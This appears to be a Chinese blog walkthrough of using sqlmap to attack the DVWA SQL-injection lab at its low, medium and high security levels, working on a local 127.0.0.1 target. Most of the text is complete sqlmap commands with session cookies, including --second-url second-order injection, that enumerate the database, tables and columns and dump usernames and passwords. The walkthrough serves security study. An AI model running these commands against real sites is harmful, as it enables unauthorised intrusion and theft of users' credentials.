当前位置: 首页 > news >正文

dvwa的三个模式下sqlmap命令一把梭哈

本文章仅用于学习,禁止用于其他

文章目录

  • 前言
  • 一、sqlmap工具(kali自带)
  • 二、DVWA靶场三种模式下sqlmap使用
    • Low级别
      • 爆库
      • 爆表
      • 爆字段
      • 爆密码
    • medium
      • 爆库
      • 爆表
      • 爆字段
      • 爆密码
    • high
      • 爆库
      • 爆表
      • 爆字段
      • 爆密码
  • 总结


前言

SQL注入(SQL Injection,简称SQLi)是一种常见的网络安全攻击手段。攻击者通过在Web应用程序的输入字段(如表单输入框、URL参数等)中注入恶意的SQL代码,从而欺骗数据库执行这些非预期的指令。这种攻击通常发生在应用程序对用户输入的数据未进行充分验证和过滤的情况下


一、sqlmap工具(kali自带)

所需环境:burpsuite,python2.7.18,pikachu,sqlmap1.5,phpstudy7以下

sqlmap1.9需配置python3.6以上环境

kali上只需要安装好burpsuite就行

二、DVWA靶场三种模式下sqlmap使用

Low级别

爆库

python sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"  --cookie="security=low; PHPSESSID=fpghhenonb58lv7b5gfsgajk87" --batch  --current-db

这里–cookie值抓包查看
在这里插入图片描述
–batch --current-db爆数据库
在这里插入图片描述

kali版

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"  --cookie="security=low; PHPSESSID=fpghhenonb58lv7b5gfsgajk87" --batch  --current-db

爆表

python sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"  --cookie="security=low; PHPSESSID=u7kr4u786asmevlpqvg07nt8t2" --batch -D dvwa -tables

-D+数据库 -tables查表

kali版

sqlmap -u "http://127.0.0.1/01/vulnerabilities/sqli/?id=1&Submit=Submit#"  --cookie="security=low; PHPSESSID=fpghhenonb58lv7b5gfsgajk87" --batch -D dvwa -tables

爆字段

python sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"  --cookie="security=low; PHPSESSID=u7kr4u786asmevlpqvg07nt8t2" --batch -D dvwa -columns

在这里插入图片描述

爆密码

python sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"  --cookie="security=low; PHPSESSID=u7kr4u786asmevlpqvg07nt8t2" --batch -D dvwa -T users -C user,password -dump

-T+表 -C+查询密码和用户名 -dump打印
在这里插入图片描述

medium

Medium+ --data

爆库

python  sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/01/vulnerabilities/sqli/?"  --cookie="security=medium; PHPSESSID=fpghhenonb58lv7b5gfsgajk87" --data  "id=1&Submit=Submit" --current-db

在这里插入图片描述

爆表

python  sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/01/vulnerabilities/sqli/?"  --cookie="security=medium; PHPSESSID=fpghhenonb58lv7b5gfsgajk87" --data  "id=1&Submit=Submit" --batch -D dvwa -tables

在这里插入图片描述

爆字段

python  sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/01/vulnerabilities/sqli/?"  --cookie="security=medium; PHPSESSID=fpghhenonb58lv7b5gfsgajk87" --data  "id=1&Submit=Submit" --batch -D dvwa -columns

在这里插入图片描述

爆密码

python  sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/01/vulnerabilities/sqli/?"  --cookie="security=medium; PHPSESSID=fpghhenonb58lv7b5gfsgajk87" --data  "id=1&Submit=Submit" --batch -D dvwa -T users -C user,password -dump

在这里插入图片描述

high

high+ --second-url注入

爆库

python  sqlmap的环境安装路径\sqlmap.py -u "127.0.0.1/01/vulnerabilities/sqli/session-input.php#" --data "id=1&Submit=Submit" --cookie="id=1;security=high; PHPSESSID=1ndi0p1u3f7g535olfbotrjo80" --second-url "http://127.0.0.1/01/vulnerabilities/sqli/" --current-db

在这里插入图片描述

爆表

python  sqlmap的环境安装路径\sqlmap.py -u "127.0.0.1/01/vulnerabilities/sqli/session-input.php#" --data "id=1&Submit=Submit" --cookie="id=1;security=high; PHPSESSID=1ndi0p1u3f7g535olfbotrjo80" --second-url "http://127.0.0.1/01/vulnerabilities/sqli/" --batch -D dvwa -tables

在这里插入图片描述

爆字段

python  sqlmap的环境安装路径\sqlmap.py -u "127.0.0.1/01/vulnerabilities/sqli/session-input.php#" --data "id=1&Submit=Submit" --cookie="id=1;security=high; PHPSESSID=1ndi0p1u3f7g535olfbotrjo80" --second-url "http://127.0.0.1/01/vulnerabilities/sqli/" --batch -D dvwa -columns

在这里插入图片描述

爆密码

python  sqlmap的环境安装路径\sqlmap.py -u "127.0.0.1/01/vulnerabilities/sqli/session-input.php#" --data "id=1&Submit=Submit" --cookie="id=1;security=high; PHPSESSID=1ndi0p1u3f7g535olfbotrjo80" --second-url "http://127.0.0.1/01/vulnerabilities/sqli/" --batch -D dvwa -T users -C user,password -dump

在这里插入图片描述


总结

当应用程序将用户输入直接拼接到SQL查询语句中时,攻击者可以构造恶意输入,改变原本SQL语句的结构和逻辑,进而实现对数据库的非法操作。例如,攻击者可以通过SQL注入绕过身份验证、获取敏感信息(如用户密码、信用卡信息等)、篡改数据或执行其他恶意操作

相关文章:

  • 涨薪技术|Kubernetes(k8s)之yaml语法大全
  • 显示模块(LCD1602,OLED,四位数码管)
  • 腾讯云大模型知识引擎×DeepSeek:股票分析低代码应用实践
  • 企业数字化转型规划设计1(107页PPT)(文末有下载方式)
  • FPGA时钟约束
  • 实时内核稳定性问题 - 压测异常重启问题
  • 取消Win10锁屏界面上显示的天气、市场和广告的操作
  • 【 C/C++ 包管理工具】vcpkg安装+使用
  • gradle-8.13
  • 【Java】TCP网络编程:从可靠传输到Socket实战
  • abaqus后处理导出多个节点数据的顺序
  • EtherCAT转Modbus网关如何在倍福plc组态快速配置
  • 【MCU】芯片复位与软件复位 在生产工装上的应用
  • 软考系统架构设计师之计算机组成与体系结构笔记
  • 蓝桥杯备考----小贪心+分类讨论问题---Popsicle
  • OAK相机入门(一):深度测距原理
  • lvgl学习(一)
  • xss-labs靶场训练
  • 从全局角度回顾Transformer白话版
  • 【大模型系列篇】深度解锁MCP模型上下文协议,赋能大模型玩转智能体
  • 现代科学中的盲点
  • 权威访谈丨国家疾控局就《世界卫生组织大流行协定》答记者问
  • 兴业证券:下半年A股指数稳、结构牛,中国资产重估刚刚开始
  • 昆明市委:今年起连续三年,每年在全市集中开展警示教育
  • 西安碑林“石刻艺术室”焕新:从汉画像石看到唐代石虎
  • 广东茂名信宜出现龙卷,一家具厂铁皮房受损